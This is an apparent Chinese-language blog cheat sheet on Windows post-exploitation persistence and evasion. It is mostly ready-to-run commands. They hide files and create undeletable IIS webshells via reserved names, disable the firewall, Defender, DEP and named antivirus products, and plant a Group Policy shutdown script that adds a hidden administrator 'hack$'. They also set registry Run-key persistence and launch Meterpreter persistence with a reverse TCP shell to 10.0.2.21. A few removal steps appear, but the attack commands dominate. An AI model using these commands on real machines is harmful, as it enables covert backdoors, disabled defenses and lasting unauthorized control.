一丶文件隐藏
1.使⽤Attrib +s +a +h +r命令就是把原本的⽂件夹增加了系统⽂件属性、存档⽂件属性、只读⽂件属性和隐藏⽂件属
性
attrib +s +a +h +r c:\test
2.系统⽂件夹图标
1.建⼀个⽂件夹,假设叫 “我的电脑”。
2.然后把要存放的⽂件放进⾥⾯。
3.给⽂件夹重新命名为:“我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”
4.确定后你会发现⽂件夹变成我的电脑的图标,且打开它后进⼊的也是我的电脑。
如何打开这个⽂件夹:我们先⽤WinRAR找到这个⽂件夹,然后重命名⽂件夹把后缀的“.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”删除。
然后我们再回到⽂件夹的存放地⽅,会发现已经变回原来的普通⽂件夹了
下⾯是代号:
我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
回收站.{645ff040-5081-101b-9f08-00aa002f954e}
拔号⽹络.{992CFFA0-F557-101A-88EC-00DD010CCC48}
打印机.{2227a280-3aea-1069-a2de-08002b30309d}
控制⾯板.{21ec2020-3aea-1069-a2dd-08002b30309d}
⽹上邻居.{208D2C60-3AEA-1069-A2D7-08002B30309D}
3.畸形⽬录
只需要在⽬录名后⾯加两个点(也可以为多个点)就⾏了,⽤户图形界⾯⽆法访问
创建⽬录:md a...\
复制⽂件:copy 1.asp D:\phpStudy4IIS\WWW\test\a...\1.asp
URL访问:/a../1.asp (两个点)
删除⽬录: rd /s /q a...\
4.利⽤系统保留⽂件名创建⽆法删除的webshell
Windows 下不能够以下⾯这些字样来命名⽂件/⽂件夹,包括:aux,com1,com2,prn,con和nul等,但是通过cmd下是可以创建此类⽂件夹的,使⽤copy命令即可实现:
copy 1.asp \\.\D:\\aux.asp //⽂件名形式也可以如 nul.xxx.asp
del \\.\D:\phpStudy4IIS\WWW\test\aux.asp //删除⽂件
type \\.\D:\phpStudy4IIS\WWW\test\aux.asp //读取⽂件内容
利⽤系统保留⽂件名创建⽆法删除的webshell,这类⽂件⽆法在图形界⾯删除,只能在命令⾏下删除,然⽽在IIS中,这种⽂件⼜是可以解析成功的。
⼩技巧:
attrib 1.txt //查看⽂件属性
attrib 1.txt -r -s //删除⽂件属性
attrib +H +S 1.asp 改变⽂件属性,隐藏
attrib -H -S 1.asp
5.驱动级⽂件隐藏
驱动隐藏我们可以⽤过⼀些软件来实现,软件名字叫:Easy File Locker 下载链接: http://www.xoslab.com/efl.html
⼀般做都会这样设置:只勾选可读,其他的⼀律拒绝……那么,会有这样的效果,该⽂件不会显示,不能通过列⽬录列出来,也不能删除,除⾮你知道完整路径,你才可以读取⽂件内容。并且该软件还可以设置密码,启动、修改设置、卸载及重复安装的时候都需要密码,更蛋疼的是,主界⾯、卸载程序等都可以删除,只留下核⼼的驱动⽂件就⾏了。
如何清除?
1、查询服务状态: sc qc xlkfs
2、停⽌服务: net stop xlkfs 服务停⽌以后,经驱动级隐藏的⽂件即可显现
3、删除服务: sc delete xlkfs
4、删除系统⽬录下⾯的⽂件,重启系统,确认服务已经被清理了。
二丶关闭杀软
关闭杀软都是需要高权限的
关闭防⽕墙命令:netsh advfirewall set allprofiles state off
命令关闭Denfnder:Net stop windefend
命令关闭DEP(数据执⾏保护):bcdedit.exe /set {current} nx Alwaysoff
命令关闭杀毒软件:
在meterpreter下执⾏ run post/windows/manage/killav(不好用,用kill更好
net stop sharedaccess ----关系统⾃带防⽕墙
c:\pskill.exe ravmon ntsd –c -q -p PID ----杀掉瑞星软件
c:\pskill.exe pfw ----关天⽹防⽕墙
net stop "Symantec AntiVirus" ----关诺顿企业版
net stop KAVStart c:\pskill kavstart / KWatch ----关闭⾦⼭杀毒
net stop fmdaemon c:\pskill.exe syncserver 关闭webguard主⻚防修改软件的⽅法
三、策略组
相对来说,组策略后⻔更加隐蔽。往册表中添加相应键值实现随系统启动⽽运⾏是⽊⻢常⽤的伎俩,也为⼤家所熟知。其实,在最策略中也可以实现该功能,不仅如此它还可以实现在系统关机时进⾏某些操作。这就是通过最策略的“脚本(启动/关机)”项来说实现。具体位置在“计算机配置→Windows设置”项下。因为其极具隐蔽性,因此常常被攻击者利⽤来做服务器后⻔。攻击者获得了服务器的控制权就可以通过这个后⻔实施对对主机的⻓期控制。它可以通过这个后⻔运⾏某些程序或者脚本,最简单的⽐如创建⼀个管理员⽤户,他可以这样做:
echo off
net user hack$ test168 /add
net localgroup administrators hack$ /add
exit
在“运⾏”对话框中输⼊gpedit.msc,定位到“计算机配置⼀>Windows设置⼀>脚本(启动/关机)”, 双击右边窗⼝的“关机”,在其中添加add.bat。就是说当系统关机时创建gslw$⽤户。对于⼀般的⽤户是根本不知道在系统中有⼀个隐藏⽤户,就是他看⻅并且删除了该帐户,当系统关机时⼜会创建该帐户。所以说,如果⽤户不知道组策略中的这个地⽅那他⼀定会感到莫名其妙。
其实,对于组策略中的这个“后⻔”还有很多利⽤法,攻击者通过它来运⾏脚本或者程序,嗅探管理员密码等等。当他们获取了管理员的密码后,就不⽤在系统中创建帐户了,直接利⽤管理员帐户远程登录系统。因此它也是“双刃剑”,希望⼤家重视这个地⽅。当你为服务器被攻击⽽莫名其妙时,说不定攻击者就是通过它实现的。
四、注册表运行键
1.当前用户的运行键
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
在下⼀次登录期间,有效负载将执⾏并与回传给Meterpeter
2.Meterpreter运行键
另外两个注册表位置,这些位置可以允许红队通过执行任意有效负载或DLL来实现持久性。但是需要管理员级别的特权。
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.dll"
3.Meterpreter 任意DLL
Metasploit Framework通过使用Meterpreter脚本和后期利用模块来支持通过注册表的持久性。Meterpreter脚本将以VBS脚本的形式创建一个有效负载,该负载将被拖放到磁盘上,并将创建一个注册表项,该注册表项将在用户登录期间运行该有效负载
run persistence -U -P windows/x64/meterpreter/reverse_tcp -i 5 -p 443 -r 10.0.2.21
3.Metasploit –持久性利用后开发模块配置
use post/windows/manage/persistence_exe
set REXEPATH /tmp/pentestlab.exe
set SESSION 2
set STARTUP USER
set LOCALEXEPATH C:\\tmp
run
1687
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
